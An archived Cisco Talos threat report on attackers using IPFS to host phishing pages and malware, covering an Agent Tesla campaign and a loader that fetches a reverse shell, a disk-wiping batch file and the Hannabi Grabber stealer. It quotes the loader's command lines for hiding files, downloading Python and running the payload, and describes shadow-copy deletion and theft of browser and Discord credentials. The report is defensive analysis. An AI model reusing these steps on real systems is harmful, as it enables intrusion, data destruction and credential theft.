{
	"id": "2e4ae9b8-819a-4bf9-841f-915bac1b5bed",
	"created_at": "2026-04-06T00:14:47.392879Z",
	"updated_at": "2026-04-10T03:21:58.537473Z",
	"deleted_at": null,
	"sha1_hash": "ad2ec9b16e9fd5ac699a09ee59df60ee4293c7b8",
	"title": "Threat Spotlight: Cyber Criminal Adoption of IPFS for Phishing, Malware Campaigns",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1938698,
	"plain_text": "Threat Spotlight: Cyber Criminal Adoption of IPFS for Phishing,\r\nMalware Campaigns\r\nBy Edmund Brumaghin\r\nPublished: 2022-11-09 · Archived: 2026-04-05 19:34:20 UTC\r\nThe InterPlanetary File System (IPFS) is an emerging Web3 technology that is currently seeing widespread\r\nabuse by threat actors.\r\nCisco Talos has observed multiple ongoing campaigns that leverage the IPFS network to host their\r\nmalware payloads and phishing kit infrastructure while facilitating other attacks.\r\nIPFS is often used for legitimate purposes, which makes it more difficult for security teams to differentiate\r\nbetween benign and malicious IPFS activity in their networks.\r\nMultiple malware families are currently being hosted within IPFS and retrieved during the initial stages of\r\nmalware attacks.\r\nOrganizations should become familiar with these new technologies and how they are being leveraged by\r\nthreat actors to defend against new techniques that use them.\r\nThe emergence of new Web3 technologies in recent years has resulted in drastic changes to the way content is\r\nhosted and accessed on the internet. Many of these technologies are focused on circumventing censorship and\r\ndecentralizing control of large portions of the content and infrastructure people use and access on a regular basis.\r\nWhile these technologies have legitimate uses in a variety of practical applications, they also create opportunities\r\nfor adversaries to take advantage of them within their phishing and malware distribution campaigns. Over the past\r\nfew years, Talos has observed an increase in the number of cybercriminals taking advantage of technologies like\r\nthe InterPlanetary File System (IPFS) to facilitate the hosting of malicious content as they provide the equivalent\r\nof “bulletproof hosting” and are extremely resilient to attempts to moderate the content stored there.\r\nWhat is the InterPlanetary File System (IPFS)?\r\nThe InterPlanetary File System (IPFS) is a Web3 technology designed to enable decentralized storage of resources\r\non the internet. When content is stored on the IPFS network, it is mirrored across many systems that participate in\r\nthe network, so that when one of these systems is unavailable, other systems can service requests for this content.\r\nIPFS stores different types of data, such as the images associated with NFTs, resources used to render web pages,\r\nor files that can be accessed by internet users. IPFS was designed to be resilient against content censorship,\r\nmeaning that it is not possible to effectively remove content from within the IPFS network once it’s stored there.\r\nIPFS gateways\r\nUsers that wish to access content stored within IPFS can do so either using an IPFS client, such as the one\r\nprovided here, or they can make use of “IPFS Gateways” which effectively sit between the internet and the IPFS\r\nhttps://blog.talosintelligence.com/ipfs-abuse/\r\nPage 1 of 15\n\nnetwork to allow clients to access content hosted on the network. This functionality is similar to what Tor2web\r\ngateways provide to access contents within the Tor network without requiring a client installation.\r\nAnyone can set up an IPFS gateway using a range of publicly available tools. This screenshot shows several of the\r\npublic IPFS gateways accessible across the internet.\r\nIt is simple to store new content within IPFS and once there, the content is resilient against takedowns, making it\r\nincreasingly attractive to a variety of attackers for hosting phishing pages, malware payloads and other malicious\r\ncontent.\r\nWhen systems use IPFS gateways to access contents stored on the IPFS network, they typically rely on the same\r\nHTTP/HTTPS-based communications used to access other websites on the internet. IPFS gateways can be\r\nconfigured to handle incoming requests in a few different ways. In some implementations, the subdomain\r\nspecified in the HTTP request is often used to locate the requested resource on the IPFS network as shown in the\r\nfollowing example, which is a mirrored copy of Wikipedia hosted on the IPFS network. The IPFS identifier, or\r\nCID, for the resource is highlighted below.\r\nhxxps[:]//bafybeiaysi4s6lnjev27ln5icwm6tueaw2vdykrtjkwiphwekaywqhcjze[.]ipfs[.]infura-ipfs[.]io\r\nIn other implementations, the IPFS resource location is appended to the end of the URL being requested, as shown\r\nin the following example:\r\nhxxps[:]//ipfs[.]io/ipfs/bafybeiaysi4s6lnjev27ln5icwm6tueaw2vdykrtjkwiphwekaywqhcjze\r\nThere are other methods for handling requests using DNS entries, as well. The specific implementation varies\r\nacross IPFS gateways. Browsers have even begun implementing native support for the IPFS network, removing\r\nhttps://blog.talosintelligence.com/ipfs-abuse/\r\nPage 2 of 15\n\nthe need to use IPFS gateways in some cases.\r\nIPFS use in phishing campaigns\r\nIPFS is currently being leveraged to host phishing kits, which are the websites that phishing campaigns typically\r\nuse to collect and harvest credentials from unsuspecting victims. In one example, the victim received a PDF that\r\npurports to be associated with the DocuSign document-signing service. A screenshot of one such PDF is shown\r\nbelow.\r\nWhen the victim clicks on the “Review Document” link, they are redirected to a page made to appear as if it is a\r\nMicrosoft authentication page. However, the page is actually being hosted on the IPFS network.\r\nhttps://blog.talosintelligence.com/ipfs-abuse/\r\nPage 3 of 15\n\nThe user is prompted to enter an email address and password. This information is then transmitted to the attacker\r\nvia an HTTP POST request to an attacker-controlled web server where it can be collected and processed for use in\r\nfurther attacks.\r\nWe’ve observed several similar examples in phishing campaigns over the past year, as adversaries recognize the\r\ncontent moderation challenges associated with hosting their phishing kits on the IPFS network. In this case, the\r\nPDF hyperlink was pointing to an IPFS gateway that moderated the content to protect potential victims and\r\ndisplayed the following message to victims attempting to navigate to it.\r\nhttps://blog.talosintelligence.com/ipfs-abuse/\r\nPage 4 of 15\n\nHowever, the content is still present within the IPFS network and simply changing the IPFS gateway being used to\r\nretrieve the content confirms this is the case.\r\nIPFS use in malware campaigns\r\nThere are a variety of threat actors currently leveraging technologies like IPFS in their malware distribution\r\ncampaigns. It provides low-cost storage for malicious payloads while offering resilience against content\r\nmoderation, effectively acting as “bulletproof hosting” for adversaries. Likewise, the use of common IPFS\r\ngateways for accessing the malicious contents hosted within the IPFS network makes it more difficult for\r\norganizations to block access when compared to the use of malicious domains for content retrieval. We have\r\nobserved various samples in the wild that are currently leveraging IPFS.\r\nThroughout 2022, we’ve observed the volume of samples in the wild continuing to increase as this becomes a\r\nmore popular hosting method for adversaries. Below is a graphic showing the increase in the number of unique\r\nsamples relying on IPFS that have been uploaded to public sample repositories.\r\nAgent Tesla malspam campaign\r\nWe’ve observed ongoing malspam campaigns leveraging IPFS throughout the infection process to eventually\r\nretrieve a malware payload. In one example, the email sent to victims purports to be from a Turkish financial\r\ninstitution and claims to be associated with SWIFT payments, a commonly used system for international monetary\r\ntransactions.\r\nhttps://blog.talosintelligence.com/ipfs-abuse/\r\nPage 5 of 15\n\nThe email contains a ZIP attachment that holds a PE32 executable. The executable, written in .NET, functions as a\r\ndownloader for the next stage of the infection chain. When executed, the downloader reaches out to an IPFS\r\ngateway to retrieve a blob of data that has been hosted within the IPFS network as shown below.\r\nhttps://blog.talosintelligence.com/ipfs-abuse/\r\nPage 6 of 15\n\nThis data contains an obfuscated PE32 executable that functions as the next-stage malware payload. The\r\ndownloader takes the data from the IPFS gateway and stores each byte in an array. It then uses a key value stored\r\nin the executable to convert the byte array into the next-stage PE32.\r\nThis is then reflectively loaded and executed, launching the next stage of the infection process, which in this case\r\nis a remote access trojan (RAT) called Agent Tesla.\r\nIn another example, we observed a variety of malware payloads being uploaded to public sample repositories over\r\na period of several months. We identified three distinct clusters of malware that were likely being created by the\r\nsame threat actor. Code-level issues suggest that many of the samples were currently undergoing active\r\ndevelopment while being uploaded, possibly to test detection capabilities.\r\nIn all three clusters, the initial payload functioned as a loader and operated similarly, however, the final payload\r\nhosted on the IPFS network was different in each cluster. The final payloads we observed included a Python-based\r\ninformation stealer, reverse shell payloads that were likely generated using msfvenom, and a batch file designed to\r\ndestroy victim systems.\r\nInitial loader\r\nThe loader used in all of these cases functioned similarly, sometimes hosted on the Discord content delivery\r\nnetwork (CDN), a practice that has become increasingly common with malware distributors as previously\r\ndescribed here. The file names used indicate that they may have been spread under the guise of cheats and cracks\r\nfor video games such as “Minecraft.” In most cases, the loader was not packed, but we did observe samples\r\npacked using UPX.\r\nWhen executed, the loader first creates a directory structure within %APPDATA% using the following command:\r\nC:\\Windows\\system32\\cmd.exe /c cd %appdata%\\Microsoft \u0026\u0026 mkdir Network\r\nThe malware then attempts to retrieve Python 3.10 from the legitimate software provider using the cURL\r\ncommand.\r\nhttps://blog.talosintelligence.com/ipfs-abuse/\r\nPage 7 of 15\n\nThis is notable, as the choice to directly leverage cURL may significantly reduce the number of potential victims,\r\nas it was not added to Windows as a native command line utility until Windows 11. The command line syntax\r\nused to initiate the download is shown below.\r\nC:\\Windows\\system32\\cmd.exe /c curl https://www.python.org/ftp/python/3.10.4/python-3.10.4-embed-amd64.zip -o %appdata%\\Microsoft\\Network\\python-3.10.4-embed-amd64.zip\r\nOnce the ZIP archive has been retrieved, it is then unzipped into the directory that was previously created using\r\nthe PowerShell “Expand-Archive” cmdlet.\r\nC:\\Windows\\system32\\cmd.exe /c cd %appdata%\\Microsoft\\Network \u0026\u0026 powershell Expand-Archive python-3.10.4-embed-amd64.zip -DestinationPath %appdata%\\Microsoft\\Network\r\nThe malware then attempts to retrieve the final payload in the infection chain, storing it within the Network\r\ndirectory using the filename “Packages.txt.” An example of the loader retrieving Hannabi Grabber, an information\r\nstealer written in Python is shown below.\r\nThe loader then uses the attrib.exe utility to set the System and Hidden flags on the previously created directory as\r\nwell as the Python ZIP archive and final payload that was retrieved.\r\nC:\\Windows\\system32\\cmd.exe /c attrib +S +H %appdata%\\Microsoft\\Network\r\nC:\\Windows\\system32\\cmd.exe /c attrib +S +H %appdata%\\Microsoft\\Network\\python-3.10.4-embed-amd64.zip\r\nC:\\Windows\\system32\\cmd.exe /c attrib +S +H %appdata%\\Microsoft\\Network\\Packages.txt\r\nhttps://blog.talosintelligence.com/ipfs-abuse/\r\nPage 8 of 15\n\nFinally, the loader invokes the newly downloaded Python executable and passes the final payload as a command\r\nline argument, executing the next stage of the infection process.\r\nC:\\Windows\\system32\\cmd.exe /c cd %appdata%\\Microsoft\\Network \u0026\u0026 python.exe Packages.txt\r\nIn some cases, the malware was also observed achieving persistence via adding entries into the Windows registry\r\nat the following locations:\r\nHKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\r\nHKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nDuring our analysis of samples associated with this loader, we observed that the IPFS gateway that was being used\r\nwas no longer servicing requests, however, Talos obtained the next-stage payloads manually via another IPFS\r\ngateways for analysis.\r\nReverse shell\r\nIn one of the clusters leveraging this loader, we observed that the payload being hosted within the IPFS network\r\nwas a Python script containing a large base64 encoded blob along with the Python code responsible for decoding\r\nthe base64. Note that the following screenshot was redacted for space, as the base64-encoded blob was rather\r\nlarge.\r\nThe base64 contained several layers of base64 encoded blobs, each wrapped in Python code responsible for\r\ndecoding them. After decoding all of the layers, the following is the deobfuscated reverse shell payload.\r\nhttps://blog.talosintelligence.com/ipfs-abuse/\r\nPage 9 of 15\n\nAt the time of analysis, the C2 server was no longer servicing requests on TCP/4444.\r\nDestructive Malware\r\nIn another cluster we analyzed, we observed that the final payload hosted within IPFS was a Windows batch file,\r\nas shown below:\r\nWhen the batch file is retrieved, it is stored within the Network directory using the filename “Script.bat.”\r\nThis batch file is responsible for the following destructive behavior:\r\nDeleting volume shadow copies on the system.\r\nDeleting directory contents stored within C:\\Users (typically associated with user profiles).\r\nIterating through all mounted filesystems present on the system and deleting contents stored on them.\r\nFortunately for victims, in the samples analyzed the loader incorrectly attempts to invoke the batch file as shown\r\nbelow.\r\nC:\\Windows\\system32\\cmd.exe /c cd %appdata%\\Microsoft\\Network \u0026\u0026 powershell -Command start script.bat\r\n-Verb RunAs\r\nHannabi Grabber\r\nThe final cluster of malware associated with this loader is responsible for retrieving and executing a Python-based\r\ninformation stealer called Hannabi Grabber. In the samples we analyzed, the Python version retrieved does not\r\nnatively contain the modules required for the script to successfully execute causing the infection process to fail,\r\nhowever, given the volume of features present in the stealer, we analyzed it to confirm detection capabilities in the\r\ncase that it is distributed via different mechanisms.\r\nHannabi Grabber is a full-featured information stealer written in Python. It leverages Discord Webhooks for C2\r\nand data exfiltration. It currently features support for stealing information from a variety of applications that may\r\nbe present on victim systems. It collects survey information from the infected machine, obtains the geographic\r\nlocation of the system via the IPInfo service, takes screenshots and eventually transmits that data to an attacker-controlled Discord server in JSON format.\r\nBelow is a listing of many of the various applications the stealer supports.\r\nhttps://blog.talosintelligence.com/ipfs-abuse/\r\nPage 10 of 15\n\nIn addition to the previously listed applications, the malware also supports retrieving password and cookie data\r\nfrom Chrome, as shown below.\r\nhttps://blog.talosintelligence.com/ipfs-abuse/\r\nPage 11 of 15\n\nSimilar functionality also exists to target Mozilla Firefox browser data that may be present on the system.\r\nThe information stealer is particularly interested in Discord and Roblox data. It features several mechanisms that\r\ncheck for the existence of Discord Token Protectors such as DiscordTokenProtector, BetterDiscord and more. If\r\ndiscovered, the malware will attempt to bypass them to obtain Discord tokens from the victim. An example of one\r\nof these checks is shown below.\r\nApplication data that is collected is stored within a directory structure inside of the %TEMP% directory, in a\r\nfolder called “RedDiscord” that is created by the malware. Before exfiltrating the data, the malware creates a ZIP\r\narchive within the RedDiscord directory called “Hannabi-\u003cUSERNAME\u003e.zip.” The malware first transmits\r\nbeacon information and will then attempt to exfiltrate the newly created ZIP archive.\r\nhttps://blog.talosintelligence.com/ipfs-abuse/\r\nPage 12 of 15\n\nHannabi Grabber has a significant amount of functionality that is common to information-stealing malware.\r\nTypically, attackers will attempt to leverage PyInstaller or Py2EXE to compile their Python into a PE32 file\r\nformat prior to distributing it to victims. This is a case where instead, the attacker chose to include a Python\r\ninstallation process during the infection and is leveraging Python directly to steal sensitive information from\r\nvictims.\r\nConclusion\r\nMany new Web3 technologies have emerged recently, attempting to provide valuable functionality to users. As\r\nthese technologies have continued to see increased adoption for legitimate purposes, they have begun to be\r\nleveraged by adversaries as well. We have continued to observe an increase in the volume of malware and\r\nphishing campaigns that are taking advantage of technologies like IPFS for the purposes of hosting malicious\r\ncomponents used in malware infections, phishing kits used to collect sensitive authentication data and more.\r\nWe expect this activity to continue to increase as more threat actors recognize that IPFS can be used to facilitate\r\nbulletproof hosting, is resilient against content moderation and law enforcement activities, and introduces\r\nproblems for organizations attempting to detect and defend against attacks that may leverage the IPFS network.\r\nOrganizations should be aware of how these newly emerging technologies are being actively used across the threat\r\nhttps://blog.talosintelligence.com/ipfs-abuse/\r\nPage 13 of 15\n\nlandscape and evaluate how to best implement security controls to prevent or detect successful attacks in their\r\nenvironments.\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here.\r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in\r\nthese attacks.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of\r\ntheir campaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products.\r\nUmbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and\r\nURLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites\r\nand tests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.\r\nThe following Snort SIDs are applicable to this threat: 60728.\r\nThe following ClamAV signatures are applicable to this threat:\r\nWin.Trojan.AgentTesla-9974905-1\r\nPdf.Phishing.Agent-9974919-0\r\nhttps://blog.talosintelligence.com/ipfs-abuse/\r\nPage 14 of 15\n\nTxt.Malware.ArtifactDeletion-9974896-0\r\nWin.Trojan.AgentTesla-9974906-0\r\nWin.Downloader.ReverseShell-9974652-1\r\nWin.Loader.Hannabi-9974435-0\r\nWin.Trojan.Hannabi_Grabber-9974436-0\r\nPy.Malware.ReverseShell-9974437-0\r\nOrbital Queries\r\nCisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints\r\nare infected with this specific threat. For specific OSqueries on this threat, click here\r\nIndicators of Compromise\r\nIndicators of Compromise associated with this threat can be found here.\r\nSource: https://blog.talosintelligence.com/ipfs-abuse/\r\nhttps://blog.talosintelligence.com/ipfs-abuse/\r\nPage 15 of 15",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://blog.talosintelligence.com/ipfs-abuse/"
	],
	"report_names": [
		"ipfs-abuse"
	],
	"threat_actors": [],
	"ts_created_at": 1775434487,
	"ts_updated_at": 1775791318,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ad2ec9b16e9fd5ac699a09ee59df60ee4293c7b8.pdf",
		"text": "https://archive.orkl.eu/ad2ec9b16e9fd5ac699a09ee59df60ee4293c7b8.txt",
		"img": "https://archive.orkl.eu/ad2ec9b16e9fd5ac699a09ee59df60ee4293c7b8.jpg"
	}
}